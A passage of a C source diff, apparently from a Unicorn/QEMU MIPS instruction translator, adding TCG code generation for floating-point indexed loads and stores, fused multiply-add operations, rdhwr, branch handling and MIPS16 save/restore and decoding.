must perform the actual + memory access. */ + switch (opc) { + case OPC_LWXC1: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_qemu_ld_tl(ctx->uc, t0, t0, ctx->mem_idx, MO_TESL); + tcg_gen_trunc_tl_i32(tcg_ctx, fp0, t0); + gen_store_fpr32(ctx, fp0, fd); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "lwxc1"; + break; + case OPC_LDXC1: + check_cop1x(ctx); + check_cp1_registers(ctx, fd); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_qemu_ld_i64(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEQ); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "ldxc1"; + break; + case OPC_LUXC1: + check_cp1_64bitmode(ctx); + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x7); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + + tcg_gen_qemu_ld_i64(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEQ); + gen_store_fpr64(ctx, fp0, fd); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "luxc1"; + break; + case OPC_SWXC1: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + gen_load_fpr32(ctx, fp0, fs); + tcg_gen_qemu_st_i32(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEUL); + tcg_temp_free_i32(tcg_ctx, fp0); + } + opn = "swxc1"; + store = 1; + break; + case OPC_SDXC1: + check_cop1x(ctx); + check_cp1_registers(ctx, fs); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + tcg_gen_qemu_st_i64(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEQ); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "sdxc1"; + store = 1; + break; + case OPC_SUXC1: + check_cp1_64bitmode(ctx); + tcg_gen_andi_tl(tcg_ctx, t0, t0, ~0x7); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + gen_load_fpr64(ctx, fp0, fs); + tcg_gen_qemu_st_i64(ctx->uc, fp0, t0, ctx->mem_idx, MO_TEQ); + tcg_temp_free_i64(tcg_ctx, fp0); + } + opn = "suxc1"; + store = 1; + break; + } + tcg_temp_free(tcg_ctx, t0); + (void)opn; (void)store; /* avoid compiler warnings */ + MIPS_DEBUG("%s %s, %s(%s)", opn, fregnames[store ? fs : fd], + regnames[index], regnames[base]); +} + +static void gen_flt3_arith (DisasContext *ctx, uint32_t opc, + int fd, int fr, int fs, int ft) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + const char *opn = "flt3_arith"; + + switch (opc) { + case OPC_ALNV_PS: + check_cp1_64bitmode(ctx); + { + TCGv t0 = tcg_temp_local_new(tcg_ctx); + TCGv_i32 fp = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fph = tcg_temp_new_i32(tcg_ctx); + int l1 = gen_new_label(tcg_ctx); + int l2 = gen_new_label(tcg_ctx); + + gen_load_gpr(ctx, t0, fr); + tcg_gen_andi_tl(tcg_ctx, t0, t0, 0x7); + + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, 0, l1); + gen_load_fpr32(ctx, fp, fs); + gen_load_fpr32h(ctx, fph, fs); + gen_store_fpr32(ctx, fp, fd); + gen_store_fpr32h(ctx, fph, fd); + tcg_gen_br(tcg_ctx, l2); + gen_set_label(tcg_ctx, l1); + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, t0, 4, l2); + tcg_temp_free(tcg_ctx, t0); +#ifdef TARGET_WORDS_BIGENDIAN + gen_load_fpr32(ctx, fp, fs); + gen_load_fpr32h(ctx, fph, ft); + gen_store_fpr32h(ctx, fp, fd); + gen_store_fpr32(ctx, fph, fd); +#else + gen_load_fpr32h(ctx, fph, fs); + gen_load_fpr32(ctx, fp, ft); + gen_store_fpr32(ctx, fph, fd); + gen_store_fpr32h(ctx, fp, fd); +#endif + gen_set_label(tcg_ctx, l2); + tcg_temp_free_i32(tcg_ctx, fp); + tcg_temp_free_i32(tcg_ctx, fph); + } + opn = "alnv.ps"; + break; + case OPC_MADD_S: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_load_fpr32(ctx, fp2, fr); + gen_helper_float_madd_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + } + opn = "madd.s"; + break; + case OPC_MADD_D: + check_cop1x(ctx); + check_cp1_registers(ctx, fd | fs | ft | fr); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_madd_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "madd.d"; + break; + case OPC_MADD_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_madd_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "madd.ps"; + break; + case OPC_MSUB_S: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_load_fpr32(ctx, fp2, fr); + gen_helper_float_msub_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + } + opn = "msub.s"; + break; + case OPC_MSUB_D: + check_cop1x(ctx); + check_cp1_registers(ctx, fd | fs | ft | fr); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_msub_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "msub.d"; + break; + case OPC_MSUB_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_msub_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "msub.ps"; + break; + case OPC_NMADD_S: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_load_fpr32(ctx, fp2, fr); + gen_helper_float_nmadd_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + } + opn = "nmadd.s"; + break; + case OPC_NMADD_D: + check_cop1x(ctx); + check_cp1_registers(ctx, fd | fs | ft | fr); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_nmadd_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "nmadd.d"; + break; + case OPC_NMADD_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_nmadd_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "nmadd.ps"; + break; + case OPC_NMSUB_S: + check_cop1x(ctx); + { + TCGv_i32 fp0 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp1 = tcg_temp_new_i32(tcg_ctx); + TCGv_i32 fp2 = tcg_temp_new_i32(tcg_ctx); + + gen_load_fpr32(ctx, fp0, fs); + gen_load_fpr32(ctx, fp1, ft); + gen_load_fpr32(ctx, fp2, fr); + gen_helper_float_nmsub_s(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i32(tcg_ctx, fp0); + tcg_temp_free_i32(tcg_ctx, fp1); + gen_store_fpr32(ctx, fp2, fd); + tcg_temp_free_i32(tcg_ctx, fp2); + } + opn = "nmsub.s"; + break; + case OPC_NMSUB_D: + check_cop1x(ctx); + check_cp1_registers(ctx, fd | fs | ft | fr); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_nmsub_d(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "nmsub.d"; + break; + case OPC_NMSUB_PS: + check_cp1_64bitmode(ctx); + { + TCGv_i64 fp0 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp1 = tcg_temp_new_i64(tcg_ctx); + TCGv_i64 fp2 = tcg_temp_new_i64(tcg_ctx); + + gen_load_fpr64(ctx, fp0, fs); + gen_load_fpr64(ctx, fp1, ft); + gen_load_fpr64(ctx, fp2, fr); + gen_helper_float_nmsub_ps(tcg_ctx, fp2, tcg_ctx->cpu_env, fp0, fp1, fp2); + tcg_temp_free_i64(tcg_ctx, fp0); + tcg_temp_free_i64(tcg_ctx, fp1); + gen_store_fpr64(ctx, fp2, fd); + tcg_temp_free_i64(tcg_ctx, fp2); + } + opn = "nmsub.ps"; + break; + default: + MIPS_INVAL(opn); + generate_exception (ctx, EXCP_RI); + return; + } + (void)opn; /* avoid a compiler warning */ + MIPS_DEBUG("%s %s, %s, %s, %s", opn, fregnames[fd], fregnames[fr], + fregnames[fs], fregnames[ft]); +} + +static void gen_rdhwr(DisasContext *ctx, int rt, int rd) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv t0; + +#if !defined(CONFIG_USER_ONLY) + /* The Linux kernel will emulate rdhwr if it's not supported natively. + Therefore only check the ISA in system mode. */ + check_insn(ctx, ISA_MIPS32R2); +#endif + t0 = tcg_temp_new(tcg_ctx); + + switch (rd) { + case 0: + save_cpu_state(ctx, 1); + gen_helper_rdhwr_cpunum(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case 1: + save_cpu_state(ctx, 1); + gen_helper_rdhwr_synci_step(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case 2: + save_cpu_state(ctx, 1); + gen_helper_rdhwr_cc(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case 3: + save_cpu_state(ctx, 1); + gen_helper_rdhwr_ccres(tcg_ctx, t0, tcg_ctx->cpu_env); + gen_store_gpr(tcg_ctx, t0, rt); + break; + case 29: +#if defined(CONFIG_USER_ONLY) + tcg_gen_ld_tl(tcg_ctx, t0, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); + gen_store_gpr(tcg_ctx, t0, rt); + break; +#else + if ((ctx->hflags & MIPS_HFLAG_CP0) || + (ctx->hflags & MIPS_HFLAG_HWRENA_ULR)) { + tcg_gen_ld_tl(tcg_ctx, t0, tcg_ctx->cpu_env, + offsetof(CPUMIPSState, active_tc.CP0_UserLocal)); + gen_store_gpr(tcg_ctx, t0, rt); + } else { + generate_exception(ctx, EXCP_RI); + } + break; +#endif + default: /* Invalid */ + MIPS_INVAL("rdhwr"); + generate_exception(ctx, EXCP_RI); + break; + } + tcg_temp_free(tcg_ctx, t0); +} + +static void gen_branch(DisasContext *ctx, int insn_bytes) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + if (ctx->hflags & MIPS_HFLAG_BMASK) { + int proc_hflags = ctx->hflags & MIPS_HFLAG_BMASK; + /* Branches completion */ + ctx->hflags &= ~MIPS_HFLAG_BMASK; + ctx->bstate = BS_BRANCH; + save_cpu_state(ctx, 0); + /* FIXME: Need to clear can_do_io. */ + switch (proc_hflags & MIPS_HFLAG_BMASK_BASE) { + case MIPS_HFLAG_FBNSLOT: + MIPS_DEBUG("forbidden slot"); + gen_goto_tb(ctx, 0, ctx->pc + insn_bytes); + break; + case MIPS_HFLAG_B: + /* unconditional branch */ + MIPS_DEBUG("unconditional branch"); + if (proc_hflags & MIPS_HFLAG_BX) { + tcg_gen_xori_i32(tcg_ctx, tcg_ctx->hflags, tcg_ctx->hflags, MIPS_HFLAG_M16); + } + gen_goto_tb(ctx, 0, ctx->btarget); + break; + case MIPS_HFLAG_BL: + /* blikely taken case */ + MIPS_DEBUG("blikely branch taken"); + gen_goto_tb(ctx, 0, ctx->btarget); + break; + case MIPS_HFLAG_BC: + /* Conditional branch */ + MIPS_DEBUG("conditional branch"); + { + int l1 = gen_new_label(tcg_ctx); + + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_NE, *(TCGv *)tcg_ctx->bcond, 0, l1); + gen_goto_tb(ctx, 1, ctx->pc + insn_bytes); + gen_set_label(tcg_ctx, l1); + gen_goto_tb(ctx, 0, ctx->btarget); + } + break; + case MIPS_HFLAG_BR: + /* unconditional branch to register */ + MIPS_DEBUG("branch to register"); + if (ctx->insn_flags & (ASE_MIPS16 | ASE_MICROMIPS)) { + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); + + tcg_gen_andi_tl(tcg_ctx, t0, *(TCGv *)tcg_ctx->btarget, 0x1); + tcg_gen_trunc_tl_i32(tcg_ctx, t1, t0); + tcg_temp_free(tcg_ctx, t0); + tcg_gen_andi_i32(tcg_ctx, tcg_ctx->hflags, tcg_ctx->hflags, ~(uint32_t)MIPS_HFLAG_M16); + tcg_gen_shli_i32(tcg_ctx, t1, t1, MIPS_HFLAG_M16_SHIFT); + tcg_gen_or_i32(tcg_ctx, tcg_ctx->hflags, tcg_ctx->hflags, t1); + tcg_temp_free_i32(tcg_ctx, t1); + + tcg_gen_andi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_PC, *(TCGv *)tcg_ctx->btarget, ~(target_ulong)0x1); + } else { + tcg_gen_mov_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_PC, *(TCGv *)tcg_ctx->btarget); + } + if (ctx->singlestep_enabled) { + save_cpu_state(ctx, 0); + gen_helper_0e0i(tcg_ctx, raise_exception, EXCP_DEBUG); + } + tcg_gen_exit_tb(tcg_ctx, 0); + break; + default: + MIPS_DEBUG("unknown branch"); + break; + } + } +} + +/* ISA extensions (ASEs) */ +/* MIPS16 extension to MIPS32 */ + +/* MIPS16 major opcodes */ +enum { + M16_OPC_ADDIUSP = 0x00, + M16_OPC_ADDIUPC = 0x01, + M16_OPC_B = 0x02, + M16_OPC_JAL = 0x03, + M16_OPC_BEQZ = 0x04, + M16_OPC_BNEQZ = 0x05, + M16_OPC_SHIFT = 0x06, + M16_OPC_LD = 0x07, + M16_OPC_RRIA = 0x08, + M16_OPC_ADDIU8 = 0x09, + M16_OPC_SLTI = 0x0a, + M16_OPC_SLTIU = 0x0b, + M16_OPC_I8 = 0x0c, + M16_OPC_LI = 0x0d, + M16_OPC_CMPI = 0x0e, + M16_OPC_SD = 0x0f, + M16_OPC_LB = 0x10, + M16_OPC_LH = 0x11, + M16_OPC_LWSP = 0x12, + M16_OPC_LW = 0x13, + M16_OPC_LBU = 0x14, + M16_OPC_LHU = 0x15, + M16_OPC_LWPC = 0x16, + M16_OPC_LWU = 0x17, + M16_OPC_SB = 0x18, + M16_OPC_SH = 0x19, + M16_OPC_SWSP = 0x1a, + M16_OPC_SW = 0x1b, + M16_OPC_RRR = 0x1c, + M16_OPC_RR = 0x1d, + M16_OPC_EXTEND = 0x1e, + M16_OPC_I64 = 0x1f +}; + +/* I8 funct field */ +enum { + I8_BTEQZ = 0x0, + I8_BTNEZ = 0x1, + I8_SWRASP = 0x2, + I8_ADJSP = 0x3, + I8_SVRS = 0x4, + I8_MOV32R = 0x5, + I8_MOVR32 = 0x7 +}; + +/* RRR f field */ +enum { + RRR_DADDU = 0x0, + RRR_ADDU = 0x1, + RRR_DSUBU = 0x2, + RRR_SUBU = 0x3 +}; + +/* RR funct field */ +enum { + RR_JR = 0x00, + RR_SDBBP = 0x01, + RR_SLT = 0x02, + RR_SLTU = 0x03, + RR_SLLV = 0x04, + RR_BREAK = 0x05, + RR_SRLV = 0x06, + RR_SRAV = 0x07, + RR_DSRL = 0x08, + RR_CMP = 0x0a, + RR_NEG = 0x0b, + RR_AND = 0x0c, + RR_OR = 0x0d, + RR_XOR = 0x0e, + RR_NOT = 0x0f, + RR_MFHI = 0x10, + RR_CNVT = 0x11, + RR_MFLO = 0x12, + RR_DSRA = 0x13, + RR_DSLLV = 0x14, + RR_DSRLV = 0x16, + RR_DSRAV = 0x17, + RR_MULT = 0x18, + RR_MULTU = 0x19, + RR_DIV = 0x1a, + RR_DIVU = 0x1b, + RR_DMULT = 0x1c, + RR_DMULTU = 0x1d, + RR_DDIV = 0x1e, + RR_DDIVU = 0x1f +}; + +/* I64 funct field */ +enum { + I64_LDSP = 0x0, + I64_SDSP = 0x1, + I64_SDRASP = 0x2, + I64_DADJSP = 0x3, + I64_LDPC = 0x4, + I64_DADDIU5 = 0x5, + I64_DADDIUPC = 0x6, + I64_DADDIUSP = 0x7 +}; + +/* RR ry field for CNVT */ +enum { + RR_RY_CNVT_ZEB = 0x0, + RR_RY_CNVT_ZEH = 0x1, + RR_RY_CNVT_ZEW = 0x2, + RR_RY_CNVT_SEB = 0x4, + RR_RY_CNVT_SEH = 0x5, + RR_RY_CNVT_SEW = 0x6, +}; + +static int xlat (int r) +{ + static int map[] = { 16, 17, 2, 3, 4, 5, 6, 7 }; + + return map[r]; +} + +static void gen_mips16_save (DisasContext *ctx, + int xsregs, int aregs, + int do_ra, int do_s0, int do_s1, + int framesize) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + int args, astatic; + + switch (aregs) { + case 0: + case 1: + case 2: + case 3: + case 11: + args = 0; + break; + case 4: + case 5: + case 6: + case 7: + args = 1; + break; + case 8: + case 9: + case 10: + args = 2; + break; + case 12: + case 13: + args = 3; + break; + case 14: + args = 4; + break; + default: + generate_exception(ctx, EXCP_RI); + return; + } + + switch (args) { + case 4: + gen_base_offset_addr(ctx, t0, 29, 12); + gen_load_gpr(ctx, t1, 7); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); + /* Fall through */ + case 3: + gen_base_offset_addr(ctx, t0, 29, 8); + gen_load_gpr(ctx, t1, 6); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); + /* Fall through */ + case 2: + gen_base_offset_addr(ctx, t0, 29, 4); + gen_load_gpr(ctx, t1, 5); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); + /* Fall through */ + case 1: + gen_base_offset_addr(ctx, t0, 29, 0); + gen_load_gpr(ctx, t1, 4); + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); + } + + gen_load_gpr(ctx, t0, 29); + +#define DECR_AND_STORE(reg) do { \ + tcg_gen_subi_tl(tcg_ctx, t0, t0, 4); \ + gen_load_gpr(ctx, t1, reg); \ + tcg_gen_qemu_st_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TEUL); \ + } while (0) + + if (do_ra) { + DECR_AND_STORE(31); + } + + switch (xsregs) { + case 7: + DECR_AND_STORE(30); + /* Fall through */ + case 6: + DECR_AND_STORE(23); + /* Fall through */ + case 5: + DECR_AND_STORE(22); + /* Fall through */ + case 4: + DECR_AND_STORE(21); + /* Fall through */ + case 3: + DECR_AND_STORE(20); + /* Fall through */ + case 2: + DECR_AND_STORE(19); + /* Fall through */ + case 1: + DECR_AND_STORE(18); + } + + if (do_s1) { + DECR_AND_STORE(17); + } + if (do_s0) { + DECR_AND_STORE(16); + } + + switch (aregs) { + case 0: + case 4: + case 8: + case 12: + case 14: + astatic = 0; + break; + case 1: + case 5: + case 9: + case 13: + astatic = 1; + break; + case 2: + case 6: + case 10: + astatic = 2; + break; + case 3: + case 7: + astatic = 3; + break; + case 11: + astatic = 4; + break; + default: + generate_exception(ctx, EXCP_RI); + return; + } + + if (astatic > 0) { + DECR_AND_STORE(7); + if (astatic > 1) { + DECR_AND_STORE(6); + if (astatic > 2) { + DECR_AND_STORE(5); + if (astatic > 3) { + DECR_AND_STORE(4); + } + } + } + } +#undef DECR_AND_STORE + + tcg_gen_subi_tl(tcg_ctx, *cpu_gpr[29], *cpu_gpr[29], framesize); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_mips16_restore (DisasContext *ctx, + int xsregs, int aregs, + int do_ra, int do_s0, int do_s1, + int framesize) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int astatic; + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv t1 = tcg_temp_new(tcg_ctx); + + tcg_gen_addi_tl(tcg_ctx, t0, *cpu_gpr[29], framesize); + +#define DECR_AND_LOAD(reg) do { \ + tcg_gen_subi_tl(tcg_ctx, t0, t0, 4); \ + tcg_gen_qemu_ld_tl(ctx->uc, t1, t0, ctx->mem_idx, MO_TESL); \ + gen_store_gpr(tcg_ctx, t1, reg); \ + } while (0) + + if (do_ra) { + DECR_AND_LOAD(31); + } + + switch (xsregs) { + case 7: + DECR_AND_LOAD(30); + /* Fall through */ + case 6: + DECR_AND_LOAD(23); + /* Fall through */ + case 5: + DECR_AND_LOAD(22); + /* Fall through */ + case 4: + DECR_AND_LOAD(21); + /* Fall through */ + case 3: + DECR_AND_LOAD(20); + /* Fall through */ + case 2: + DECR_AND_LOAD(19); + /* Fall through */ + case 1: + DECR_AND_LOAD(18); + } + + if (do_s1) { + DECR_AND_LOAD(17); + } + if (do_s0) { + DECR_AND_LOAD(16); + } + + switch (aregs) { + case 0: + case 4: + case 8: + case 12: + case 14: + astatic = 0; + break; + case 1: + case 5: + case 9: + case 13: + astatic = 1; + break; + case 2: + case 6: + case 10: + astatic = 2; + break; + case 3: + case 7: + astatic = 3; + break; + case 11: + astatic = 4; + break; + default: + generate_exception(ctx, EXCP_RI); + return; + } + + if (astatic > 0) { + DECR_AND_LOAD(7); + if (astatic > 1) { + DECR_AND_LOAD(6); + if (astatic > 2) { + DECR_AND_LOAD(5); + if (astatic > 3) { + DECR_AND_LOAD(4); + } + } + } + } +#undef DECR_AND_LOAD + + tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[29], *cpu_gpr[29], framesize); + tcg_temp_free(tcg_ctx, t0); + tcg_temp_free(tcg_ctx, t1); +} + +static void gen_addiupc (DisasContext *ctx, int rx, int imm, + int is_64_bit, int extended) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + TCGv t0; + + if (extended && (ctx->hflags & MIPS_HFLAG_BMASK)) { + generate_exception(ctx, EXCP_RI); + return; + } + + t0 = tcg_temp_new(tcg_ctx); + + tcg_gen_movi_tl(tcg_ctx, t0, pc_relative_pc(ctx)); + tcg_gen_addi_tl(tcg_ctx, *cpu_gpr[rx], t0, imm); + if (!is_64_bit) { + tcg_gen_ext32s_tl(tcg_ctx, *cpu_gpr[rx], *cpu_gpr[rx]); + } + + tcg_temp_free(tcg_ctx, t0); +} + +#if defined(TARGET_MIPS64) +static void decode_i64_mips16 (DisasContext *ctx, + int ry, int funct, int16_t offset, + int extended) +{ + switch (funct) { + case I64_LDSP: + check_mips_64(ctx); + offset = extended ? offset : offset << 3; + gen_ld(ctx, OPC_LD, ry, 29, offset); + break; + case I64_SDSP: + check_mips_64(ctx); + offset = extended ? offset : offset << 3; + gen_st(ctx, OPC_SD, ry, 29, offset); + break; + case I64_SDRASP: + check_mips_64(ctx); + offset = extended ? offset : (ctx->opcode & 0xff) << 3; + gen_st(ctx, OPC_SD, 31, 29, offset); + break; + case I64_DADJSP: + check_mips_64(ctx); + offset = extended ? offset : ((int8_t)ctx->opcode) << 3; + gen_arith_imm(ctx, OPC_DADDIU, 29, 29, offset); + break; + case I64_LDPC: + if (extended && (ctx->hflags & MIPS_HFLAG_BMASK)) { + generate_exception(ctx, EXCP_RI); + } else { + offset = extended ? offset : offset << 3; + gen_ld(ctx, OPC_LDPC, ry, 0, offset); + } + break; + case I64_DADDIU5: + check_mips_64(ctx); + offset = extended ? offset : ((int8_t)(offset << 3)) >> 3; + gen_arith_imm(ctx, OPC_DADDIU, ry, ry, offset); + break; + case I64_DADDIUPC: + check_mips_64(ctx); + offset = extended ? offset : offset << 2; + gen_addiupc(ctx, ry, offset, 1, extended); + break; + case I64_DADDIUSP: + check_mips_64(ctx); + offset = extended ? offset : offset << 2; + gen_arith_imm(ctx, OPC_DADDIU, ry, 29, offset); + break; + } +} +#endif + +static int decode_extended_mips16_opc (CPUMIPSState *env, DisasContext *ctx) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + int extend = cpu_lduw_code(env, ctx->pc + 2); + int op, rx, ry, funct, sa; + int16_t imm, offset; + + ctx->opcode = (ctx->opcode << 16) | extend; + op = (ctx->opcode >> 11) & 0x1f; + sa = (ctx->opcode >> 22) & 0x1f; + funct = (ctx->opcode >> 8) & 0x7; + rx = xlat((ctx->opcode >> 8) & 0x7); + ry = xlat((ctx->opcode >> 5) & 0x7); + offset = imm = (int16_t) (((ctx->opcode >> 16) & 0x1f) << 11 + | ((ctx->opcode >> 21) & 0x3f) << 5 + | (ctx->opcode & 